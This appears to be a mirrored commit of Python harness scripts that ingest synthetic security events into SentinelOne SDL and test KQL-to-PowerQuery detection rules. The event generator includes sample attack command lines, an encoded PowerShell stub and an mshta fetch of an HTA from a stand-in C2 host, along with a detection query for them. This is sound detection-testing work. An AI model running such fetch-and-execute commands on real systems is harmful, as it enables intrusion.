mirror of
https://github.com/marcredhat/kql
synced 2026-06-13 07:11:17 +00:00
Initial commit: KQL ↔ SDL PowerQuery proof of equivalence
This commit is contained in:
@@ -0,0 +1,34 @@
|
||||
#!/usr/bin/env python3
"""Count duplicate timestamps within the generated JSONL.

SDL appears to dedupe addEvents by (session, ts) - events sharing a ts
within the same session are silently dropped. If our generator emits many
events at colliding ts_epoch_ms values, only one of each cluster survives.
"""
import json
from collections import Counter, defaultdict
from pathlib import Path

JSONL = Path(__file__).resolve().parents[1] / "sample_data" / "events.jsonl"


def tally(lines):
    """Count events and distinct timestamps per event type.

    Args:
        lines: iterable of JSONL lines; each non-blank line must decode to an
            object with ``event_type`` and ``ts_epoch_ms`` keys.

    Returns:
        ``(totals, unique_ts)`` where ``totals`` is a Counter of events per
        event type and ``unique_ts`` maps event type to the set of distinct
        ``ts_epoch_ms`` values seen for it.
    """
    totals = Counter()
    unique_ts = defaultdict(set)
    for line in lines:
        # Tolerate blank lines (e.g. a trailing newline at end of file).
        if not line.strip():
            continue
        rec = json.loads(line)
        event_type = rec["event_type"]
        totals[event_type] += 1
        unique_ts[event_type].add(rec["ts_epoch_ms"])
    return totals, unique_ts


def format_report(totals, unique_ts):
    """Render the per-type collision table as a list of output lines."""
    out = [
        f"{'event_type':30s} {'events':>8} {'uniq_ts':>8} {'collision_loss%':>16}",
        "-" * 70,
    ]
    for et in sorted(totals):
        n = totals[et]
        u = len(unique_ts[et])
        # Share of events that would be dropped if only one event per
        # distinct timestamp survives.
        loss = 100 * (n - u) / n if n else 0
        out.append(f"{et:30s} {n:>8} {u:>8} {loss:>15.1f}%")
    out.append("-" * 70)
    out.append(f"{'TOTAL':30s} {sum(totals.values()):>8} "
               f"{sum(len(s) for s in unique_ts.values()):>8}")
    return out


def main():
    """Read the sample JSONL and print the collision report."""
    with JSONL.open(encoding="utf-8") as f:
        totals, unique_ts = tally(f)
    for row in format_report(totals, unique_ts):
        print(row)


if __name__ == "__main__":
    main()
|
||||
@@ -0,0 +1,101 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Diagnose why most of our 445 generated events are not queryable in SDL.
|
||||
|
||||
Strategy:
|
||||
1. Take 5 CommonSecurityLog events straight from the generated JSONL,
|
||||
decorate them with a unique probe marker, and ingest as a single batch.
|
||||
2. Wait 10 s for indexing.
|
||||
3. Query for the marker to confirm they are queryable.
|
||||
4. Then bulk-ingest the entire JSONL and report per-event-type counts in SDL
|
||||
vs counts in the local file - to expose where the loss happens.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import sys
|
||||
import time
|
||||
from collections import Counter
|
||||
from pathlib import Path
|
||||
|
||||
ROOT = Path(__file__).resolve().parents[1]
|
||||
sys.path.insert(0, str(ROOT))
|
||||
from harness.sdl_client import add_events, power_query, ingest_jsonl, _clean_attrs # noqa: E402
|
||||
|
||||
JSONL = ROOT / "sample_data" / "events.jsonl"
|
||||
MARKER = f"loss-probe-{int(time.time())}"
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Step 1: per-type counts in the local file
|
||||
# ---------------------------------------------------------------------------
|
||||
local_counts = Counter()
|
||||
with JSONL.open() as f:
|
||||
for line in f:
|
||||
rec = json.loads(line)
|
||||
local_counts[rec["event_type"]] += 1
|
||||
|
||||
print("=" * 80)
|
||||
print("Local JSONL event_type counts")
|
||||
print("=" * 80)
|
||||
for k, v in sorted(local_counts.items()):
|
||||
print(f" {k:30s} {v}")
|
||||
print(f" {'TOTAL':30s} {sum(local_counts.values())}")
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Step 2: pick 5 CSL events from disk, mark them, ingest, query
|
||||
# ---------------------------------------------------------------------------
|
||||
csl_events = []
|
||||
with JSONL.open() as f:
|
||||
for line in f:
|
||||
rec = json.loads(line)
|
||||
if rec["event_type"] == "CommonSecurityLog":
|
||||
rec["loss_marker"] = MARKER
|
||||
ts_ms = int(rec["ts_epoch_ms"])
|
||||
cleaned = _clean_attrs(rec)
|
||||
csl_events.append({"ts": str(ts_ms * 1_000_000), "sev": 3,
|
||||
"thread": "T1", "attrs": cleaned})
|
||||
if len(csl_events) >= 5:
|
||||
break
|
||||
|
||||
print()
|
||||
print("=" * 80)
|
||||
print(f"Step 2: ingesting 5 marker-tagged CSL events ({MARKER})")
|
||||
print("=" * 80)
|
||||
r = add_events(csl_events)
|
||||
print(f"addEvents -> {json.dumps(r)}")
|
||||
print("waiting 10 s for indexing ...")
|
||||
time.sleep(10)
|
||||
|
||||
probe_q = f"loss_marker='{MARKER}' | group n = count() by event_type"
|
||||
r = power_query(probe_q, "1h")
|
||||
print(f"probe query (1h) -> matching={r.get('matchingEvents')}, rows={r.get('values')}")
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Step 3: full bulk ingest of the file via the harness helper
|
||||
# ---------------------------------------------------------------------------
|
||||
print()
|
||||
print("=" * 80)
|
||||
print("Step 3: full bulk ingest of every event in JSONL")
|
||||
print("=" * 80)
|
||||
sent = ingest_jsonl(JSONL)
|
||||
print(f"ingest_jsonl reports {sent} events sent")
|
||||
print("waiting 20 s for indexing ...")
|
||||
time.sleep(20)
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Step 4: per-event-type count in SDL
|
||||
# ---------------------------------------------------------------------------
|
||||
print()
|
||||
print("=" * 80)
|
||||
print("Step 4: SDL counts by event_type")
|
||||
print("=" * 80)
|
||||
print(f"{'event_type':30s} {'local':>8} {'SDL':>8} {'loss%':>8}")
|
||||
print("-" * 60)
|
||||
for et in sorted(local_counts):
|
||||
q = f"event_type='{et}' | group n = count()"
|
||||
r = power_query(q, "1h")
|
||||
sdl_n = 0
|
||||
if r.get("values"):
|
||||
sdl_n = int(r["values"][0][0] or 0)
|
||||
local_n = local_counts[et]
|
||||
loss = 100 * (local_n - sdl_n) / local_n if local_n else 0
|
||||
print(f"{et:30s} {local_n:>8} {sdl_n:>8} {loss:>7.0f}%")
|
||||
@@ -0,0 +1,46 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Probe what data is actually queryable in SDL after ingestion."""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import sys
|
||||
import time
|
||||
from pathlib import Path
|
||||
|
||||
sys.path.insert(0, str(Path(__file__).resolve().parents[1]))
|
||||
from harness.sdl_client import power_query # noqa: E402
|
||||
|
||||
QUERIES = [
|
||||
("any serverHost=kql-proof",
|
||||
"serverHost='kql-proof' | columns event_type, UserPrincipalName, ts_epoch_ms | limit 5"),
|
||||
("count by event_type",
|
||||
"serverHost='kql-proof' | group n=count() by event_type"),
|
||||
("SigninLogs by user",
|
||||
"serverHost='kql-proof' event_type='SigninLogs' | group n=count() by UserPrincipalName"),
|
||||
("SigninLogs min/max ts_epoch_ms",
|
||||
"serverHost='kql-proof' event_type='SigninLogs' | group mn=min(ts_epoch_ms), mx=max(ts_epoch_ms), n=count()"),
|
||||
("recent SigninLogs (no time filter)",
|
||||
"serverHost='kql-proof' event_type='SigninLogs' Location='RU' | columns UserPrincipalName, Location | limit 10"),
|
||||
("SecurityEvent EventID column type",
|
||||
"serverHost='kql-proof' event_type='SecurityEvent' | columns EventID, NewProcessName | limit 5"),
|
||||
("Audit OperationName",
|
||||
"serverHost='kql-proof' event_type='AuditLogs' | columns OperationName | limit 10"),
|
||||
]
|
||||
|
||||
for name, q in QUERIES:
|
||||
print("=" * 80)
|
||||
print(f"# {name}")
|
||||
print(f" query: {q}")
|
||||
t = time.time()
|
||||
r = power_query(q, start_time="30d")
|
||||
rows = r.get("values") or []
|
||||
cols = [c.get("name") if isinstance(c, dict) else c
|
||||
for c in (r.get("columns") or [])]
|
||||
print(f" status={r.get('status')} matching={r.get('matchingEvents')} "
|
||||
f"rows={len(rows)} took={time.time()-t:.1f}s")
|
||||
if r.get("status", "").startswith("error/"):
|
||||
print(f" ERROR_BODY: {json.dumps(r, indent=2)[:800]}")
|
||||
if rows:
|
||||
print(f" cols: {cols}")
|
||||
for row in rows[:5]:
|
||||
print(" ", dict(zip(cols, row)))
|
||||
@@ -0,0 +1,40 @@
|
||||
#!/usr/bin/env python3
"""Wider probe: try a variety of filters and start windows to find our data."""
import json
import sys
import time
from pathlib import Path

sys.path.insert(0, str(Path(__file__).resolve().parents[1]))
from harness.sdl_client import power_query

# (label, PowerQuery, start window) triples.
QUERIES = [
    ("event_type=SigninLogs 7d (no serverHost)",
     "event_type='SigninLogs' | columns UserPrincipalName | limit 5", "7d"),
    ("event_type=SigninLogs 1h",
     "event_type='SigninLogs' | columns UserPrincipalName, ts_epoch_ms | limit 5", "1h"),
    ("UserPrincipalName matching contoso",
     "UserPrincipalName='alice@contoso.com' | columns event_type, UserPrincipalName | limit 5", "1d"),
    ("anything from xdr tenant 1h",
     "* | columns event_type, serverHost, logfile | limit 5", "1h"),
    ("logfile contains kql-proof",
     "logfile contains 'kql-proof' | columns event_type | limit 5", "7d"),
    ("contoso.com in attrs",
     "Identity contains 'contoso.com' | columns event_type, Identity | limit 5", "1d"),
    ("test: count any events tenant-wide 5m",
     "* | group n=count()", "5m"),
]

for label, query, start in QUERIES:
    print("=" * 80)
    print(f"# {label} (start={start})")
    print(f" q: {query}")
    started = time.time()
    resp = power_query(query, start_time=start)
    result_rows = resp.get("values") or []

    # Column descriptors may be dicts carrying a "name" key or bare values.
    col_names = []
    for col in resp.get("columns") or []:
        col_names.append(col.get("name") if isinstance(col, dict) else col)

    print(f" status={resp.get('status')} matching={resp.get('matchingEvents')} "
          f"rows={len(result_rows)} took={time.time()-started:.1f}s")
    if resp.get("status", "").startswith("error/"):
        print(f" ERROR: {json.dumps(resp)[:500]}")
    # Show at most the first five rows, keyed by column name.
    for row in result_rows[:5]:
        print(" ", dict(zip(col_names, row)))
|
||||
@@ -0,0 +1,198 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Export each rule's KQL and PowerQuery to disk.
|
||||
|
||||
The exported `.pq` files are:
|
||||
* SELF-CONTAINED and RUNNABLE — every template placeholder
|
||||
(`{RECENT_MS}`) is substituted with a concrete value from the
|
||||
current time anchor, so you can paste straight into SDL.
|
||||
* PRETTY-PRINTED — one pipeline stage per line with continuation
|
||||
indents, matching the style in pmoses-s1/claude-skills.
|
||||
* HEADER-DECORATED — a `//`-comment block names the rule, describes
|
||||
intent, lists field references, and tells the reader what
|
||||
`startTime` to use when running the query.
|
||||
* VALIDATED — after writing, every `.pq` is parsed for known
|
||||
anti-patterns from the SentinelOne PowerQuery skill's pitfalls
|
||||
list (literal `{` braces, deprecated `first()`/`last()`/
|
||||
`percentile()`, leading `*` filter, missing leading pipe before
|
||||
`join`/`union`, etc.). Errors abort the export so the published
|
||||
repo never contains broken queries.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import re
|
||||
import sys
|
||||
from pathlib import Path
|
||||
|
||||
ROOT = Path(__file__).resolve().parents[1]
|
||||
sys.path.insert(0, str(ROOT))
|
||||
from rules import RULES, NOW, RECENT_START, BASELINE_START # noqa: E402
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Pretty-printer: turn a single-line PQ string into multi-line idiomatic form.
|
||||
# ---------------------------------------------------------------------------
|
||||
def pretty(pq: str) -> str:
    """Reflow a single-line PowerQuery into one pipeline stage per line.

    All whitespace runs are collapsed to a single space, then the text is cut
    on " | ". The leading filter (if non-empty) is emitted as-is and every
    later stage is prefixed with "| ". A `group <aggs> by <fields>` stage is
    expanded further: each top-level aggregate goes on its own line and the
    `by ...` clause gets a line of its own.
    """
    flat = re.sub(r"\s+", " ", pq).strip()
    head, *stages = (piece.strip() for piece in flat.split(" | "))

    rendered: list[str] = []
    if head:
        rendered.append(head)

    for stage in stages:
        grouped = re.match(
            r"^group\s+(.+?)\s+by\s+(.+)$", stage, flags=re.IGNORECASE | re.DOTALL)
        if grouped is None:
            # Ordinary stage: one line, leading pipe.
            rendered.append("| " + stage)
            continue

        by_clause = grouped.group(2).strip()
        # Commas nested inside parentheses do not separate aggregates.
        first, *rest = [agg.strip() for agg in _split_top_level_commas(grouped.group(1))]
        if rest:
            rendered.append("| group " + first + ",")
            rendered.extend(" " + agg + "," for agg in rest[:-1])
            # The last aggregate carries no trailing comma.
            rendered.append(" " + rest[-1])
        else:
            rendered.append("| group " + first)
        rendered.append(" by " + by_clause)

    return "\n".join(rendered)
|
||||
|
||||
|
||||
def _split_top_level_commas(s: str) -> list[str]:
|
||||
out: list[str] = []
|
||||
depth, cur = 0, []
|
||||
for ch in s:
|
||||
if ch == "(":
|
||||
depth += 1; cur.append(ch)
|
||||
elif ch == ")":
|
||||
depth -= 1; cur.append(ch)
|
||||
elif ch == "," and depth == 0:
|
||||
out.append("".join(cur)); cur = []
|
||||
else:
|
||||
cur.append(ch)
|
||||
if cur:
|
||||
out.append("".join(cur))
|
||||
return out
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Anti-pattern scanner — refuses to write a file containing known landmines.
|
||||
# ---------------------------------------------------------------------------
|
||||
# Each entry pairs a regular expression with the message reported when that
# pattern is found anywhere in an exported query.
PITFALLS: list[tuple[str, str]] = [
    (r"\{[A-Za-z_]+\}",
     "Unsubstituted template placeholder (e.g. {RECENT_MS}). "
     "Substitute before writing."),
    (r"\bfirst\s*\(",
     "first(x) is unreliable — use min_by(x, ts_epoch_ms)."),
    (r"\blast\s*\(",
     "last(x) is unreliable — use max_by(x, ts_epoch_ms)."),
    (r"\bpercentile\s*\(",
     "percentile(x, N) is not a real function — use p50/p95/p99."),
    (r"\bgroup_unique_values\s*\(",
     "group_unique_values does not exist — use array_agg_distinct(x, N)."),
    (r"(?m)^\s*\*\s*(\||$)",
     "Bare `*` as initial filter returns 500 — use `| limit 5` or "
     "`field = *`."),
    (r"(?m)^\s*(join|union)\b",
     "join/union must start with a leading `|`."),
    (r"(?m)^\s*#(cmdline|name|hash|ip|storylineid|username|dns)\b",
     "Shortcut fields (#cmdline, …) are unreliable across tenants — "
     "use the explicit field name."),
]


def scan(text: str) -> list[str]:
    """Return the message of every PITFALLS pattern found in *text*.

    Messages come back in table order; an empty list means no pattern matched.
    """
    findings: list[str] = []
    for pattern, message in PITFALLS:
        if re.search(pattern, text) is not None:
            findings.append(message)
    return findings
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Header builder
|
||||
# ---------------------------------------------------------------------------
|
||||
def header(rule: dict, recent_iso: str, now_iso: str) -> str:
    """Build the `//`-comment banner placed at the top of an exported query.

    Args:
        rule: rule record; its "id", "description" and "pq" keys are read.
        recent_iso: ISO-8601 text of the recent-window cutoff.
        now_iso: ISO-8601 text of the export time anchor.

    Returns:
        The comment block as a single string ending in a newline.
    """
    # `rule["pq"]` is the raw template. Blank out `{PLACEHOLDER}` tokens and
    # quoted string literals first, so template names (RECENT_MS) and literal
    # values ('SigninLogs', 'RU') are not reported as field references.
    skeleton = re.sub(r"\{[A-Za-z_]+\}|'[^']*'|\"[^\"]*\"", " ", rule["pq"])
    keywords = {"and", "or", "not", "true", "false",
                "filter", "group", "by", "let", "columns",
                "sort", "limit", "join", "union", "in",
                "contains", "matches"}
    # Heuristic: a capitalised identifier that is not a keyword is a field.
    field_refs = sorted({
        tok for tok in re.findall(r"\b[A-Z][A-Za-z0-9_]+\b", skeleton)
        if tok.lower() not in keywords
    })
    lines = [
        f"// Rule: {rule['id']}",
        f"// {rule['description']}",
        "//",
        "// Source KQL: see ../kql/" + rule['id'] + ".kql",
        "//",
        "// HOW TO RUN",
        "// curl POST {sdl}/api/powerQuery with this body, OR paste in",
        "// the SDL console. Set startTime = '2h' (or wider) so the API",
        "// scans the freshly-ingested epochs that contain the events.",
        "//",
        f"// Time anchor at export: NOW = {now_iso}",
        f"// Recent-window cutoff: {recent_iso}",
        "// (`ts_epoch_ms` below is that cutoff expressed in ms.",
        "// Re-run harness/export_rules.py to refresh after regenerating",
        "// sample_data/events.jsonl.)",
        "//",
        # Only the first ten names are listed; an ellipsis marks truncation.
        "// Fields referenced: " + ", ".join(field_refs[:10])
        + ("…" if len(field_refs) > 10 else ""),
        "//",
        "// EDITING NOTE",
        "// Every line that starts with `|` is a pipeline stage. Each `|`",
        "// is REQUIRED. If you delete one (e.g. while changing a literal",
        "// on the same line as a stage), SDL re-parses the keyword that",
        "// follows as a search term and rejects the query with errors",
        "// like `'estimate_distinct' is a grouping function`.",
    ]
    return "\n".join(lines) + "\n"
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Main
|
||||
# ---------------------------------------------------------------------------
|
||||
def main() -> None:
    """Render, validate and write every rule's `.pq` and `.kql` file.

    All rules are rendered and scanned in memory first. If any rule trips an
    anti-pattern, the failures are printed and the process exits with status 1
    before any file is written, so a failed run never leaves a partial export.
    """
    recent_ms = int(RECENT_START.timestamp() * 1000)
    recent_iso = RECENT_START.isoformat()
    now_iso = NOW.isoformat()

    # Pass 1: substitute, pretty-print and scan without touching the disk.
    rendered: list[tuple[dict, str]] = []
    failures: list[tuple[str, list[str]]] = []
    for r in RULES:
        body = pretty(r["pq"].replace("{RECENT_MS}", str(recent_ms)))
        bad = scan(body)
        if bad:
            failures.append((r["id"], bad))
            continue
        rendered.append((r, header(r, recent_iso, now_iso) + "\n" + body + "\n"))

    if failures:
        print("✗ Export failed — anti-patterns detected:")
        for rid, msgs in failures:
            print(f" {rid}")
            for m in msgs:
                print(f" - {m}")
        sys.exit(1)

    # Pass 2: everything validated, so write the outputs.
    pq_dir = ROOT / "pq"
    kql_dir = ROOT / "kql"
    pq_dir.mkdir(parents=True, exist_ok=True)
    kql_dir.mkdir(parents=True, exist_ok=True)
    for r, text in rendered:
        # The header may contain non-ASCII characters ("…"), so pin the
        # encoding rather than relying on the platform default.
        (pq_dir / f"{r['id']}.pq").write_text(text, encoding="utf-8")
        # Mirror the .kql (verbatim, no substitution)
        (kql_dir / f"{r['id']}.kql").write_text(
            r["kql"].strip() + "\n", encoding="utf-8")

    print(f"✓ Exported {len(RULES)} rules to kql/ and pq/")
    print(f" (RECENT_MS = {recent_ms} = {recent_iso})")


if __name__ == "__main__":
    main()
|
||||
@@ -0,0 +1,39 @@
|
||||
#!/usr/bin/env python3
"""Find SDL's age cutoff for addEvents by sending probe events at increasing
ages and seeing which ones become queryable."""
import json
import sys
import time
import uuid
from pathlib import Path

ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(ROOT))
from harness.sdl_client import add_events, power_query

TS_NOW_MS = int(time.time() * 1000)
PROBE = uuid.uuid4().hex[:8]

# 30s, 5min, 30min, 1h, 2h, 4h, 6h, 12h, 24h
ages_min = [0.5, 5, 30, 60, 120, 240, 360, 720, 1440]

# One event per age, all sent in a single batch. `ts` is the stringified
# nanosecond epoch of "now minus age"; `probe` tags each event uniquely.
events = [
    {
        "ts": str((TS_NOW_MS - int(minutes * 60 * 1000)) * 1_000_000),
        "sev": 3,
        "thread": "T1",
        "attrs": {
            "event_type": "CommonSecurityLog",
            "probe": f"{PROBE}_{idx:02d}",
            "age_min": minutes,
        },
    }
    for idx, minutes in enumerate(ages_min)
]

print(f"Sending {len(events)} events at ages {ages_min} min")
r = add_events(events)
print(f"addEvents -> {json.dumps(r)}")

print("\nWaiting 12 s ...")
time.sleep(12)

print(f"\nQuerying probe '{PROBE}' over last 48h ...")
res = power_query(f"probe contains '{PROBE}' | columns probe, age_min | limit 100", "48h")
n = res.get("matchingEvents", 0)
vals = res.get("values") or []
print(f"matching={n}")

# Second column of each returned row is the age_min attribute.
got = {row[1] for row in vals}
print(f"\n{'age_min':>8} {'sent':>6} {'queryable':>10}")
for age in ages_min:
    landed = "NO" if age not in got else "YES"
    print(f" {age:>6} {'yes':>6} {landed:>10}")
|
||||
@@ -0,0 +1,40 @@
|
||||
#!/usr/bin/env python3
"""Send one event per batch (separate addEvents call) at different ages,
each with a fresh session. This isolates whether SDL is rejecting based on
mixed-age batches or just on event age."""
import importlib
import json
import sys
import time
import uuid
from pathlib import Path

ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(ROOT))

PROBE = uuid.uuid4().hex[:8]
ages_min = [0.5, 5, 30, 60, 120, 240, 480, 720, 1440]

# Force a fresh session for *every* probe so we eliminate session dedup
import harness.sdl_client as sdl

results = []
for idx, age in enumerate(ages_min):
    importlib.reload(sdl)  # re-roll the SESSION UUID
    # Timestamp is taken per event, at send time, then shifted back by `age`.
    event_ms = int(time.time() * 1000) - int(age * 60 * 1000)
    probe_value = f"{PROBE}_{idx:02d}"
    attrs = {"event_type": "CommonSecurityLog", "probe": probe_value,
             "age_min": age}
    event = {"ts": str(event_ms * 1_000_000), "sev": 3, "thread": "T1",
             "attrs": attrs}
    reply = sdl.add_events([event])
    print(f"age={age:>6} min session={sdl.SESSION[-12:]} addEvents={reply}")
    results.append((age, probe_value))

print("\nWaiting 12 s ...")
time.sleep(12)

q = f"probe contains '{PROBE}' | columns probe, age_min | limit 100"
res = sdl.power_query(q, "48h")
n = res.get("matchingEvents", 0)
vals = res.get("values") or []
print(f"\nQuery matching={n}")

# Second column of each returned row is the age_min attribute.
got = {row[1] for row in vals}
print(f"\n{'age_min':>8} {'queryable':>10}")
for age, _probe in results:
    landed = "NO" if age not in got else "YES"
    print(f" {age:>6} {landed:>10}")
|
||||
@@ -0,0 +1,220 @@
|
||||
"""Ingest realistic events to SDL to exercise the 3-way join PowerQuery:
|
||||
|
||||
identity sign_in failures x suspicious DNS x suspicious process_start
|
||||
|
||||
Joined on (user_name) and (host). Events are spread across the last 4 hours.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import random
|
||||
import time
|
||||
from pathlib import Path
|
||||
import sys
|
||||
|
||||
ROOT = Path(__file__).resolve().parent
|
||||
sys.path.insert(0, str(ROOT))
|
||||
from sdl_client import add_events, power_query # noqa: E402
|
||||
|
||||
# Wall-clock anchor (epoch milliseconds) captured once at import time.
NOW_MS = int(time.time() * 1000)
# Width of the window events are spread over: 4 hours, in milliseconds.
WINDOW_MS = 4 * 3600 * 1000

# (user, host) personas that appear in ALL three streams and therefore join.
JOIN_TARGETS = [
    ("alice.smith", "wks-alice-01"),
    ("bob.jones", "wks-bob-02"),
    ("carol.nguyen", "wks-carol-03"),
]

# Users with failed logins only (no DNS / process events).
NOISE_FAILED_USERS = ["dave.kim", "erin.lopez", "frank.singh"]

# Hosts with suspicious processes but no DNS events.
NOISE_PROC_HOSTS = ["srv-build-01", "srv-jenkins-02"]

# Domain pools for the DNS stream.
SUSPECT_DOMAINS = ["c2.example.net", "suspect.example.org", "c2.example.io"]
BENIGN_DOMAINS = ["microsoft.com", "google.com", "github.com"]

# Command-line pools for the process stream.
SUSPECT_CMDS = [
    "powershell.exe -enc SQBFAFgAIA==",
    "rundll32.exe shell32.dll,Control_RunDLL",
    "mshta.exe http://c2.example.net/x.hta",
]
BENIGN_CMDS = ["explorer.exe", "chrome.exe --no-sandbox", "code.exe"]
|
||||
|
||||
|
||||
def rand_ts() -> str:
    """Return a random timestamp from the last WINDOW_MS milliseconds.

    The value is NOW_MS minus a uniformly drawn offset, converted from
    milliseconds to nanoseconds and rendered as a decimal string.
    """
    offset_ms = random.randint(0, WINDOW_MS - 1)
    return str((NOW_MS - offset_ms) * 1_000_000)
|
||||
|
||||
|
||||
def evt(ts_ns: str, attrs: dict) -> dict:
    """Wrap *attrs* in an event envelope with fixed severity 3 and thread "T1"."""
    return dict(ts=ts_ns, sev=3, attrs=attrs, thread="T1")
|
||||
|
||||
|
||||
def gen_failed_signins() -> list[dict]:
    """Generate the identity sign-in stream.

    Three groups are emitted, in this order:
      * 8-15 failures (with a random 203.0.113.x source IP) for every user
        in JOIN_TARGETS,
      * 2-6 failures for every user in NOISE_FAILED_USERS,
      * 3 successes for every user in JOIN_TARGETS.
    """
    # Attributes shared by every sign-in event; listed first so the key order
    # of each event stays category, vendor, activity, status, user[, ip].
    common = {
        "dataSource.category": "identity",
        "dataSource.vendor": "azure-ad",
        "activity_name": "sign_in",
    }
    events: list[dict] = []

    # Users in JOIN_TARGETS get many failures (so they "stand out")
    for user, _host in JOIN_TARGETS:
        burst = random.randint(8, 15)
        for _ in range(burst):
            # Draw the timestamp before the IP octet to keep the RNG sequence.
            ts = rand_ts()
            events.append(evt(ts, {
                **common,
                "status": "failure",
                "user.name": user,
                "src_endpoint.ip": f"203.0.113.{random.randint(2,254)}",
            }))

    # Noise: failed-only users
    for user in NOISE_FAILED_USERS:
        events.extend(
            evt(rand_ts(), {**common, "status": "failure", "user.name": user})
            for _ in range(random.randint(2, 6))
        )

    # Some successes (should be filtered out by status='failure')
    for user, _host in JOIN_TARGETS:
        events.extend(
            evt(rand_ts(), {**common, "status": "success", "user.name": user})
            for _ in range(3)
        )
    return events
|
||||
|
||||
|
||||
def gen_dns() -> list[dict]:
    """Generate the DNS query stream.

    For each (user, host) in JOIN_TARGETS: 3-6 queries to a suspect domain
    followed by 5 queries to a benign domain. Then, for two users outside
    JOIN_TARGETS, 3 suspect queries each from a "wks-<first name>-99" host.
    """
    def dns_event(user: str, host: str, domains: list) -> dict:
        # Timestamp is drawn before the domain to keep the RNG sequence.
        ts = rand_ts()
        return evt(ts, {
            "dataSource.category": "network",
            "dataSource.vendor": "zeek",
            "activity_name": "dns_query",
            "user.name": user,
            "device.hostname": host,
            "dns.question.name": random.choice(domains),
        })

    events: list[dict] = []
    for user, host in JOIN_TARGETS:
        # suspicious DNS for these users on their hosts
        suspicious = random.randint(3, 6)
        for _ in range(suspicious):
            events.append(dns_event(user, host, SUSPECT_DOMAINS))
        # benign DNS noise from same users
        for _ in range(5):
            events.append(dns_event(user, host, BENIGN_DOMAINS))

    # Noise: suspicious DNS for users NOT in JOIN_TARGETS (won't join failed)
    for user in ["greg.wu", "helen.park"]:
        for _ in range(3):
            # Host is computed per event, after the timestamp draw has not yet
            # happened; it involves no randomness so ordering is unaffected.
            events.append(
                dns_event(user, f"wks-{user.split('.')[0]}-99", SUSPECT_DOMAINS))
    return events
|
||||
|
||||
|
||||
def gen_process() -> list[dict]:
    """Generate the process-start stream.

    For each host in JOIN_TARGETS: 4-8 events with a suspect command line
    followed by 5 with a benign one. Then 3 suspect events for every host in
    NOISE_PROC_HOSTS.
    """
    def proc_event(host: str, commands: list) -> dict:
        # Timestamp is drawn before the command line to keep the RNG sequence.
        ts = rand_ts()
        return evt(ts, {
            "dataSource.category": "process",
            "dataSource.vendor": "sentinelone",
            "activity_name": "process_start",
            "device.hostname": host,
            "process.cmd_line": random.choice(commands),
        })

    events: list[dict] = []
    for _user, host in JOIN_TARGETS:
        suspicious = random.randint(4, 8)
        for _ in range(suspicious):
            events.append(proc_event(host, SUSPECT_CMDS))
        # benign procs on the same hosts
        for _ in range(5):
            events.append(proc_event(host, BENIGN_CMDS))

    # Noise: suspicious procs on hosts that don't appear in DNS stream
    for host in NOISE_PROC_HOSTS:
        for _ in range(3):
            events.append(proc_event(host, SUSPECT_CMDS))
    return events
|
||||
|
||||
|
||||
def chunked(seq: list, n: int):
    """Lazily yield consecutive slices of *seq*, each at most *n* items long."""
    yield from (seq[lo:lo + n] for lo in range(0, len(seq), n))
|
||||
|
||||
|
||||
def main() -> None:
    """Generate the three event streams, ingest them, then run the join.

    Events are shuffled and sent in batches of 200 under the "join-demo"
    session info. After a 20 s indexing wait, the 3-way join PowerQuery is run
    over the last 4h and its row count is printed.

    Raises:
        RuntimeError: if any addEvents call does not report status "success".
    """
    random.seed(42)
    events = gen_failed_signins() + gen_dns() + gen_process()
    random.shuffle(events)
    print(f"Generated {len(events)} events across the last 4h")

    sent = 0
    for batch in chunked(events, 200):
        r = add_events(batch, session_info={
            "serverHost": "join-demo",
            "logfile": "join-demo.jsonl",
            "parser": "json",
        })
        if r.get("status") != "success":
            raise RuntimeError(f"addEvents failed: {r}")
        sent += len(batch)
        print(f" ingested {sent}/{len(events)}")
        # Brief pause between batches.
        time.sleep(0.25)
    print(f"Done. {sent} events ingested.")

    # Quick verification: run the user's PowerQuery against last 4h
    pq = r'''| join
failed = (
dataSource.category = 'identity' AND activity_name = 'sign_in' AND status = 'failure'
| columns user_name = user.name
| group failed_signins = count() by user_name
),
dns = (
dataSource.category = 'network' AND activity_name = 'dns_query'
AND dns.question.name matches "(c2|suspect)\.example\."
| columns user_name = user.name, host = device.hostname, dns_name = dns.question.name
),
proc = (
dataSource.category = 'process' AND activity_name = 'process_start'
AND process.cmd_line matches "(powershell|rundll32|mshta)"
| columns host = device.hostname, cmd_line = process.cmd_line
)
on failed.user_name = dns.user_name, dns.host = proc.host'''

    print("\nWaiting 20s for SDL indexing, then running the join...")
    time.sleep(20)
    res = power_query(pq, start_time="4h")
    if not isinstance(res, dict):
        print(res)
        return

    print(f"PowerQuery response keys: {list(res.keys())}")
    # The other harness scripts read result rows from "values"; check it
    # first and keep the older key names as fallbacks. Testing for None
    # (rather than truthiness) lets an empty result report a count of 0.
    matches = None
    for key in ("values", "matches", "data", "results"):
        if res.get(key) is not None:
            matches = res[key]
            break
    if matches is not None:
        print(f"Match count: {len(matches) if hasattr(matches, '__len__') else matches}")
    else:
        print(res)


if __name__ == "__main__":
    main()
|
||||
@@ -0,0 +1,42 @@
|
||||
#!/usr/bin/env python3
"""After bash run_proof.sh, check what's queryable for the latest run."""
import json
import re
import sys
import time
from pathlib import Path

ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(ROOT))
from harness.sdl_client import power_query

# Look at the latest proof_run_id from the log. The log may mention several
# ids, so take the LAST occurrence rather than the first.
log = (ROOT / "reports" / "run.log").read_text()
run_ids = re.findall(r"proof_run_id=([A-Za-z0-9-]+)", log)
RUN_ID = run_ids[-1] if run_ids else None
print(f"Latest proof_run_id from log: {RUN_ID}")
